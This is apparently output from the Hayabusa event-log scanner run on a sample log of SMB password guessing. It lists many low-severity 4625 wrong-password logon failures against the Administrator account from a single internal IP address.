2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
